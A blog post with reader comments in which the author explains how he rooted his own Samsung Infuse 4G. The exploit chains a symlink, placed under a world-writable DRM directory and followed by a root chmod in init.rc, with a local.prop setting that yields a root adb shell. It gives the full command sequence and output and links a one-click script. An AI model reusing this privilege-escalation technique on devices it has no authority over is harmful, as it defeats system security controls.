Rooting the Samsung Infuse 4G

I received a Samsung Infuse 4G this year for Christmas, and one of the first questions I had was how to let this bad boy run free. Doing a little searching around, it looked like the device was already rootable by the RageAgainstTheCage exploit by the Android Exploid Crew, but of course using an already-written, pre-compiled exploit is too boring.

Note, before we even begin, the device should be placed into USB debugging mode so we can interact with it from a shell (via the ADB – Android Debug Bridge).

After some snooping around, I noticed that the device was vulnerable to a flaw similar to the ones Dan Rosenberg found with the Droid 3 and Admire. In the init.rc script (which is run at startup as root), we see the following command:

# Permission for WMDRM sample.hds file
chmod 0777  /data/data/.drm/.wmdrm/sample.hds

The sample.hds file doesn’t actually exist, but that fact is irrelevant to the situation. The interesting thing here is that the .wmdrm directory is also 0777, so we have full control over its contents. Let’s create a symlink to /data where sample.hds is supposed to be and reboot:

$ ln -s /data /data/data/.drm/.wmdrm/sample.hds
$ ls -l /data/data/.drm/.wmdrm/sample.hds
lrwxrwxrwx shell    shell             2012-01-02 20:13 sample.hds -> /data
$ exit
sh-4.1$ ./adb reboot
sh-4.1$ ./adb shell
$ ls -l
drwxrwx--x system   system            2012-01-02 20:14 dbdata
dr-x------ root     root              2012-01-02 20:14 config
drwxrwx--- system   cache             2012-01-02 20:14 cache
drwxrwx--x radio    radio             2012-01-02 20:14 efs
lrwxrwxrwx root     root              2012-01-02 20:14 sdcard -> /mnt/sdcard
drwxr-xr-x root     root              2012-01-02 20:14 acct
drwxrwxr-x root     system            2012-01-02 20:14 mnt
lrwxrwxrwx root     root              2012-01-02 20:14 d -> /sys/kernel/debug
lrwxrwxrwx root     root              2012-01-02 20:14 etc -> /system/etc
drwxr-xr-x root     root              2012-01-02 20:14 system
drwxrwxrwx system   system            2012-01-02 20:14 data
drwxr-xr-x root     root              1969-12-31 19:00 sys
drwxr-xr-x root     root              2011-08-03 23:33 modules
dr-xr-xr-x root     root              1969-12-31 19:00 proc
drwxr-xr-x root     root              2012-01-02 20:14 dev
-rwxr-xr-x root     root        12127 2010-08-12 10:06 recovery.rc
-rwxr-xr-x root     root          945 2010-08-27 09:41 lpm.rc
-rw-r--r-- root     root        25100 2011-03-17 02:00 init.rc
drwxr-xr-x root     root              2011-08-03 23:33 res
drwxr-xr-x root     root              2011-08-03 23:33 lib
drwxr-xr-x root     root              2011-08-03 23:33 sbin
-rw-r--r-- root     root          118 2011-08-03 23:13 default.prop
-rw-r--r-- root     root         1677 2010-07-06 15:13 init.goldfish.rc
-rw-r--r-- root     root         2378 2010-12-14 23:01 fota.rc
-rwxr-xr-x root     root          379 2010-05-28 03:06 init.smdkc110.rc
-rwxr-xr-x root     root       133016 2011-08-03 23:19 init
$

Our symlink was followed, and now the /data directory is 0777! From here we’ll create a /data/local.prop file with a configuration setting to not drop privileges when spawning a shell:

$ echo ro.kernel.qemu=1 > /data/local.prop
$ exit
sh-4.1$ ./adb reboot
sh-4.1$

After restarting, the phone refuses to boot and vibrates a bunch due to parsing the ro.kernel.qemu property. We told the device it was running in an emulator when it’s actually still running on hardware, leading to confusion. However, we are still able to spawn a shell with adb:

sh-4.1$ ./adb shell
# id
uid=0(root) gid=2000(shell) groups=1007(log)
#

Success! For persistence, we’ll follow the typical song and dance and copy over some binaries and install the Superuser app:

# mount -o rw,remount /dev/stl9 /system
# exit
sh-4.1$ ./adb push su /system/bin
233 KB/s (26264 bytes in 0.109s)
sh-4.1$ ./adb push busybox /system/bin
500 KB/s (1867568 bytes in 3.646s)
sh-4.1$ ./adb install Superuser.apk
449 KB/s (196521 bytes in 0.427s)
    pkg: /data/local/tmp/Superuser.apk
^C
sh-4.1$ ./adb shell
# chmod 4755 /system/bin/su /system/bin/busybox
#

Clean up our files and reboot the device:

# rm /data/local.prop
# rm /data/data/.drm/.wmdrm/sample.hds
# reboot
sh-4.1$

Running `su` in the adb shell, as well as apps for rooted phones, will now prompt the user (on the phone itself) to grant root privileges to the process. This selection can be remembered for future use.

A one-click root script for Linux is available here: https://github.com/mncoppola/Infuse-4G-root. If this exploit works for other phones, contact me and I’ll update the post.

Thanks to Dan Rosenberg for his tips and guidance throughout the process.

10 thoughts on “Rooting the Samsung Infuse 4G”

Pingback: Rooting the Samsung Infuse: Just Change a File Permission – flyingpenguin
vivek saikia on January 5, 2012 at 4:22 pm said:

Do you have the unroot software for windows platform?

Reply ↓
- mncoppola on January 6, 2012 at 2:31 am said:
  
  SuperOneClick runs on Windows and should have an unroot button
  
  Reply ↓
Craig on January 14, 2012 at 1:41 am said:

Do you have a root for a Samsung galaxy precedent. I’ve tried a few with no success.

Reply ↓
- mncoppola on January 14, 2012 at 2:30 am said:
  
  Sorry, I don’t have a root exploit for that device. The only device I’ve been able to test so far is the Infuse 4G.
  
  Reply ↓
Nick on May 27, 2013 at 11:36 pm said:

have tried your method a couple times now to no avail, this is all I get:
sudo ./root.sh
Waiting until device is ready
* daemon not running. starting it now on port 5037 *
* daemon started successfully *
Creating symbolic link
link failed No such file or directory
Rebooting, waiting until device is ready
Dropping local.prop
cannot create /data/local.prop: permission denied
Rebooting, waiting until device is ready
Remounting filesystem
mount: Operation not permitted
Installing persistence apps
failed to copy ‘dependencies/su’ to ‘/system/bin/su’: Read-only file system
failed to copy ‘dependencies/busybox’ to ‘/system/bin/busybox’: Read-only file system
Unable to chmod /system/bin/su: No such file or directory
failed to copy ‘dependencies/Superuser.apk’ to ‘/system/app/Superuser.apk’: Read-only file system
Cleaning up files
rm failed for /data/local.prop, No such file or directory
rm failed for /data/data/.drm/.wmdrm/sample.hds, No such file or directory
Rebooting
Finished – Enjoy!

my phone does reboot once or twice during the process

Reply ↓
- mncoppola on May 28, 2013 at 12:16 am said:
  
  Would you mind posting the model number and build number of your device?
  
  Settings > About phone
  
  Reply ↓
  - Nick on May 28, 2013 at 12:20 am said:
    
    Model: SGH-I977R
    Build: GINGERBREAD.UXKG3
  - mncoppola on May 28, 2013 at 12:34 am said:
    
    You do have an Infuse 4G but it unfortunately seems like Rogers made custom modifications to the device that removed (or at least changed) the bug. I wrote the exploit to work against my own device, an SGH-I997 FROYO-UCKH1.
    
    You might want to try these methods instead:
    http://forum.xda-developers.com/showthread.php?t=1193927
    http://forum.xda-developers.com/showthread.php?t=1107881
    http://forum.xda-developers.com/showthread.php?t=1091465
  - Nick on May 28, 2013 at 12:37 am said:
    
    i figured it was Roger’s fault lol, I’ve had no luck rooting this damn phone, I’ve tried several different methods and with no access to a windows machine I have limited options. I’ll try the above threads and let you know, thanks for your help.